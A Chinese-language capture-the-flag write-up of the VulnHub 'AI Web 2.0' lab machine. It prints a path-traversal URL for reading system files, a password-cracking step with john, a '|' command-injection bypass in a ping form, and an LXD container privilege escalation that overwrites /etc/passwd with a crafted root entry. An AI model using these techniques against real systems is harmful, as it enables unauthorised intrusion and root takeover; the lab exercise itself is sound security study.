VulnHub靶場之AI Web 2.0
用vm打開靶機,運行kali和靶機
首先肯定查看kali的ip地址,然後使用nmap命令:nmap -sP 192.168.80.0/24掃描主機:
接下來掃描端口,nmap:nmap -p 1-65535 -sV 192.168.80.129:
開放了ssh端口和http端口~~
老樣子,先不管ssh端口,先去看看web網站,,,
發現需要登錄,,,,
先註冊一個登陸一下:
發現都點不了,,,,沒什麼卵用,,,查看一下源代碼:
發現類似於上傳的東西???不管了,先進行信息收集
掃描一下目錄:
有個401,,,,,需要登陸的,,,,
emmmm,不知道賬號密碼,,,,估計下一步就是要我們獲取賬號密碼,,,,
利用百度進行信息收集一波,,,,,
找到一個目錄穿越的漏洞,,讀取文件,,,/etc/passwd,,,
成功下載到文件,得到兩個用戶
貌似還是沒有什麼用,,,繼續讀取apache默認配置文件路徑
http://192.168.80.129/download.php?file_name=../../../../../../../../../etc/apache2/sites-enabled/000-default.conf
得到:
繼續讀取:
賬戶密碼!!!aiweb2admin:$apr1$VXqmVvDD$otU1gx4nwCgsAOA7Wi.aU/
使用john進行爆破一下,,,,發現爆破不了,,,
後面看了描述提示了字典:
This is the second box from the series AI: Web and you will have more fun to crack this challenge.
The goal is simple. Get flag from /root/flag.txt. Enumerate the box, get low privileged shell and then escalate privilege to root.
You may need to crack password. Use wordlist SecLists/rockyou-45.txt by Mr. Daniel Miessler.
For any hint please tweet on @arif_xpress
使用字典:https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou-45.txt
john --wordlist=./rockyou-45.txt 1.txt
john --show 1.txt
得到:
得到賬號密碼:aiweb2admin:c.ronaldo
去webadmin頁面進行登錄~~
訪問以下robots.txt~~有兩個目錄!!
訪問第一個目錄,,發現是個ping ip地址的,考慮是否存在命令執行:
進行嘗試命令執行,發現;不起作用,,換着看看是否能繞過,,
發現(|)可以繞過~~
ok!!先不急着彈shell,,,再看看另一個目錄/S0mextras/!提示這個目錄下有信息,,,
利用剛剛頁面的命令執行查看一下該目錄,先查看當前路徑:
然後查看,發現只存在一個index.html文件,不應該,,,懷疑存在隱藏文件,,,,
執行ls -al /var/www/html/webadmin/S0mextras/然而還是沒什麼用:
仔細想想還有什麼命令可以查看該目錄下的隱藏文件,,,
想到隱藏文件一般都是(.)開頭的,可以使用find命令:127.0.0.1|find . -type f /var/www/html/webadmin/S0mextras/
有東西的呀:
直接命令執行查看:
嗯???賬號密碼的嗎???
User: n0nr00tuser
Cred: zxowieoi4sdsadpEClDws1sf
直接嘗試ssh鏈接,成功進入:
emmm,查看內核與服務器版本:
emmmmm,都是比較新的版本,玩蛇呢????
換方法吧,,,,可是我什麼都不知道啊——\大哭\大哭
看了大佬的博客才知道還有lxc提權~~
命令查看find / -perm -u=s -type f 2>/dev/null二進制文件:
以此爲突破口,創建一個容器,並重新寫入一個root用戶帶有密碼的passwd文件上傳到創建的容器裏
以此來覆蓋主機上的passwd文件,再提權爲root,,,,懵懵懂懂~~
n0nr00tuser@aiweb2host:~$ lxc start UbuntuMini
n0nr00tuser@aiweb2host:~$ lxc config set UbuntuMini security.privileged true
n0nr00tuser@aiweb2host:~$ lxc config set UbuntuMini security.nesting true
n0nr00tuser@aiweb2host:~$ lxc config device add UbuntuMini sharetesting disk source=/etc path=/sharingiscaring
Device sharetesting added to UbuntuMini
n0nr00tuser@aiweb2host:~$
emmmm,生成passwd文件,然後上傳時權限拒絕,,,,,:
emmmmm,頂不住了,,,,,想不通了,,,,,
查找一下版本與內核的漏洞,,
最後又發現靶機上沒安裝gcc,,,安裝也安裝不上,,,再見吧你嘞!!
後面知道了,原來是沒有bash權限,,,執行python的一句話就好了:python -c 'import pty; pty.spawn("/bin/bash")'
passwd文件內容,,,,密碼:killem
root:AzbGfP688Nta.:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
aiweb2:x:1000:1000::/home/aiweb2:/bin/bash
n0nr00tuser:x:1001:1001::/home/n0nr00tuser:/bin/bash
上傳成功之後就覆蓋了原來的passwd文件,,,,,
使用su命令切換到root,拿到flag:
總結
這個靶場考的還是信息收集能力,比如說百度那一波,如果不知道去搜索那麼就不知道文件讀取漏洞了
後面也就無法繼續執行,,還有這裏用到了lxc容器進行提取,,lxd這東西,,系統容器,,
還有後面操作繼續不下去時,去看了大佬博客,並且問了問題,也感謝大佬的指導,,,還是太菜了啊!!!
附上大佬的博客:AI Web 2.0靶場題解
望以後繼續努力啊!!